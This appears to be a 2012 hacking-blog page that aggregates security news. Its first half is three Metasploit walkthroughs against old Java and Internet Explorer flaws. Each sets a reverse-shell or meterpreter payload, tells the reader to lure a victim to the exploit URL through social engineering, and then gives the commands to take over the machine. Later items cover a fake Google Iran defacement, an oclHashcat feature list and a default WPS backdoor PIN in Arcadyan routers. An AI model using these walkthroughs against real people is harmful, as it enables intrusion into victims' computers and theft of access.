Saturday, May 12, 2012

RedKit Exploit Kit : New web malware exploitation pack

Posted by THN Reporter On 5/06/2012 09:31:00 AM


RedKit Exploit Kit : New web malware exploitation pack : The Hacker News ~ http://thehackernews.com/2012/05/redkit-exploit-kit-new-web-malware.html


Hack Remote PC with Sun Java JRE AWT setDiffICM Buffer Overflow

This module exploits a flaw in the setDiffICM function in the Sun JVM. The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. The affected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. NOTE: Although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.

Exploit Targets

Windows XP service pack 2

Windows XP service pack 3

Java 6 update 16
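An added defender-side check, not part of the original post or of the Metasploit module: it parses java -version banners from a constructed host inventory and flags installs that fall inside the affected ranges quoted in the description above. Host names and banners are constructed; the update cutoffs are the ones the description lists.

```python
import re

# Cutoffs quoted in the module description: 6u16, 5.0u21, 1.4.2_23 and
# 1.3.1_26 and earlier are listed as affected.
MAX_AFFECTED_UPDATE = {
    (1, 6, 0): 16,
    (1, 5, 0): 21,
    (1, 4, 2): 23,
    (1, 3, 1): 26,
}

# Accepts "1.6.0_16", the page's "1.6.0_u11" spelling and full banner lines.
_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:_u?(\d+))?")


def parse_java_version(text):
    """Return (major, minor, micro, update) or None if no version is found."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    major, minor, micro = (int(m.group(i)) for i in (1, 2, 3))
    update = int(m.group(4)) if m.group(4) else 0  # no "_NN" means update 0
    return (major, minor, micro, update)


def is_affected_by_setdifficm(text):
    """True/False per the quoted cutoffs; None when the family is not listed."""
    parsed = parse_java_version(text)
    if parsed is None:
        return None
    family, update = parsed[:3], parsed[3]
    if family not in MAX_AFFECTED_UPDATE:
        return None  # e.g. Java 7: the description makes no claim about it
    return update <= MAX_AFFECTED_UPDATE[family]


def triage_inventory(lines):
    """Map 'host<TAB>banner' inventory lines to affected/patched/unknown."""
    labels = {True: "affected", False: "patched", None: "unknown"}
    result = {}
    for line in lines:
        host, _, banner = line.partition("\t")
        result[host.strip()] = labels[is_affected_by_setdifficm(banner)]
    return result


# Constructed sample inventory (hypothetical hosts, not from the page).
SAMPLE_INVENTORY = [
    'ws-01\tjava version "1.6.0_16"',
    'ws-02\tjava version "1.6.0_17"',
    'ws-03\tjava version "1.4.2_23"',
    'ws-04\tjava version "1.7.0_04"',
    'ws-05\tno java installed',
]
```

Hosts reported as "unknown" need a manual look: either no Java banner was captured or the version family is outside the ranges the description covers.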

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open a Backtrack terminal and type msfconsole


Now type use exploit/windows/browser/java_setdifficm_bof

Msf exploit (java_setdifficm_bof)>set payload generic/shell_reverse_tcp

Msf exploit (java_setdifficm_bof)>set lhost 192.168.1.2 (IP of Local Host)

Msf exploit (java_setdifficm_bof)>set srvhost 192.168.1.2 (This must be an address on the local machine)

Msf exploit (java_setdifficm_bof)>set uripath rulebook (The Url to use for this exploit)

Msf exploit (java_setdifficm_bof)>exploit


The URL to give to the victim is now http://192.168.1.2:8080/rulebook


Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victim's PC. Use "sessions -l" to list the sessions and note the session number, then type "sessions -i ID" to connect to that session.


Friday, May 11, 2012

How to Hack Remote Windows 7 PC

This module exploits a use-after-free vulnerability in Internet Explorer. The vulnerability occurs when an invalid object tag exists and other elements overlap/cover where the object tag should be when rendered (due to their styles/positioning). The mshtml!CObjectElement is then freed from memory because it is invalid. However, the mshtml!CDisplay object for the page continues to keep a reference to the freed object and attempts to call a function on it, leading to the use-after-free. Please note that for IE 8 targets, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention).

Exploit Targets

Internet Explorer 7 on XP SP3

Internet Explorer 7 on Windows Vista

Internet Explorer 8 on XP SP3

Internet Explorer 8 on Windows 7

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open a Backtrack terminal and type msfconsole


Now type use exploit/windows/browser/ms11_050_mshtml_cobjectelement

Msf exploit (ms11_050_mshtml_cobjectelement)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms11_050_mshtml_cobjectelement)>set lhost 192.168.1.2 (IP of Local Host)

Msf exploit (ms11_050_mshtml_cobjectelement)>set srvhost 192.168.1.2 (This must be an address on the local machine)

Msf exploit (ms11_050_mshtml_cobjectelement)>set uripath win7tricks (The Url to use for this exploit)

Msf exploit (ms11_050_mshtml_cobjectelement)>exploit


The URL to give to the victim is now http://192.168.1.2:8080/win7tricks


Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victim's PC. Use "sessions -l" to list the sessions and note the session number, then type "sessions -i ID" to connect to that session.


Hack Windows XP in LAN with JavaScript OnLoad Handler Remote Code Execution

This bug is triggered when the browser handles a JavaScript 'onLoad' handler in conjunction with an improperly initialized 'window()' JavaScript function. This exploit results in a call to an address lower than the heap. The JavaScript prompt() places our shellcode near where the call operand points to. We call prompt() multiple times in separate iframes to place our return address. We hide the prompts in a popup window behind the main window. We spray the heap a second time with our shellcode and point the return address to the heap. I use a fairly high address to make this exploit more reliable. IE will crash when the exploit completes. Also, please note that Internet Explorer must allow popups in order to continue exploitation.

Exploit Targets

Internet Explorer 5, 6

Windows XP SP2

Windows XP SP3

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open a Backtrack terminal and type msfconsole


Now type use exploit/windows/browser/ms05_054_onload

Msf exploit (ms05_054_onload)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms05_054_onload)>set lhost 192.168.1.2 (IP of Local Host)

Msf exploit (ms05_054_onload)>set srvhost 192.168.1.2 (This must be an address on the local machine)

Msf exploit (ms05_054_onload)>set uripath onload (The Url to use for this exploit)

Msf exploit (ms05_054_onload)>exploit


The URL to give to the victim is now http://192.168.1.2:8080/onload


Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victim's PC. Use "sessions -l" to list the sessions and note the session number, then type "sessions -i ID" to connect to that session.


Fake Google Iranian domain defaced by Algerian Script Kiddies

Posted by THN Reporter On 5/04/2012 07:16:00 AM

Google got pwned? No. A few Algerian script kiddies are trying to spread the fake rumour that they hacked and defaced the giant search engine's "Google Iranian" domain, http://www.google.co.ir/. The screenshot above shows an Algerian flag and the page title "H4Ck3D By vaga-hacker dz and DR.KIM". As stated by the hacker, the team includes hackers named "V4Ga-Dz,Dz0ne,DR-KIM King-Dz,BroX0 aghilass elite jrojan password kha&mix wasim -dz". It is not confirmed whether these are members of Anonymous, but they use the Anonymous tag line "We Dont Forget, We Dont Forgive, Expect Us!" to get some publicity.

According to further investigation by "The Hacker News" technical team, "google.co.ir" possibly does not belong to Google, because its site rank is "3141379", which means the site should have fewer than approximately 100 visitors per day. We also checked the WHO.IS records for this domain and found that the domain holder is "Ganjineh ofogh omid gostar laleh eshragh", registered using a Gmail address, "sellinform110@gmail.com", with phone number 09377705008.

Some readers may think that hacking a Google domain is not possible, so here is something from the past: last year the Google Bangladesh website (Google.com.bd) was also hacked by TiGER-M@TE using DNS hijacking.



Fake Google Iranian domain defaced by Algerian Script Kiddies : The Hacker News ~ http://thehackernews.com/2012/05/google-iraq-defaced-by-anonymous.html


oclHashcat-plus v0.08 Released - fastest password Cracker

Posted by THN Reporter On 5/02/2012 10:38:00 AM

oclHashcat-plus is the world's first and only GPGPU based rule engine and the world's fastest md5crypt, phpass, mscash2 and WPA/WPA2 cracker.


Features

Free

Multi-GPU (up to 16 GPUs)

Multi-Hash (up to 24 million hashes)

Multi-OS (Linux & Windows native binaries)

Multi-Platform (OpenCL & CUDA support)

Multi-Algo (see below)

Low resource utilization, you can still watch movies or play games while cracking

Focuses on highly iterated, modern hashes

Focuses on single dictionary based attacks

Supports pause / resume while cracking

Supports reading words from file

Supports reading words from stdin

Integrated thermal watchdog

20+ algorithms implemented with performance in mind

... and much more

Algorithms

MD5

Joomla

osCommerce, xt:Commerce

SHA1

SHA-1(Base64), nsldap, Netscape LDAP SHA

SSHA-1(Base64), nsldaps, Netscape LDAP SSHA

Oracle 11g

SMF > v1.1

OSX v10.4, v10.5, v10.6

MSSQL(2000)

MSSQL(2005)

MySQL

phpass, MD5(Wordpress), MD5(phpBB3)

md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5

MD4

NTLM

DCC, mscash

SHA256

descrypt, DES(Unix), Traditional DES

md5apr1, MD5(APR), Apache MD5

SHA512

OSX v10.7

DCC2, mscash2

Cisco-PIX MD5

WPA/WPA2

Double MD5

vBulletin < v3.8.5

vBulletin > v3.8.5

IPB2+, MyBB1.2+

LM

Oracle 7-10g


oclHashcat-plus v0.08 Released - fastest password Cracker : The Hacker News ~ http://thehackernews.com/2012/05/oclhashcat-plus-v008-released-fastest.html


More than 100000 Wireless Routers have Default Backdoor

Posted by THN Reporter On 4/27/2012 10:44:00 AM
A recently reported flaw that allowed an attacker to drastically reduce the number of attempts needed to guess the WPS PIN of a wireless router isn't even necessary for some Arcadyan based routers anymore.

Last year it was exposed that the WiFi Protected Setup (WPS) PIN is susceptible to a brute force attack. A design flaw in the WPS specification for PIN authentication significantly reduces the time required to brute force the entire PIN, because it lets an attacker know when the first half of the 8-digit PIN is correct. The lack of a proper lockout policy after a certain number of failed PIN attempts on many wireless routers makes this brute force attack that much more feasible.

Some 100,000 routers of type Speedport W921V, W504V and W723V are affected in Germany alone. What makes things worse is that no button has to be pushed on the device itself to exploit the backdoor, and on some of the affected routers the backdoor PIN ("12345670") still works even after the user has disabled WPS. The only currently known remedy for those models is to disable Wi-Fi altogether. Since all Arcadyan routers share the same software platform, more models might be affected.

Last year, Tactical Network Solutions developed and released Reaver, a WPA attack tool that exploits a protocol design flaw in WiFi Protected Setup (WPS). Reaver has been designed to be a robust and practical attack against WPS and has been tested against a wide variety of access points and WPS implementations. On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP.


More than 100000 Wireless Routers have Default Backdoor : The Hacker News ~ http://thehackernews.com/2012/04/more-than-100000-wireless-routers-have.html
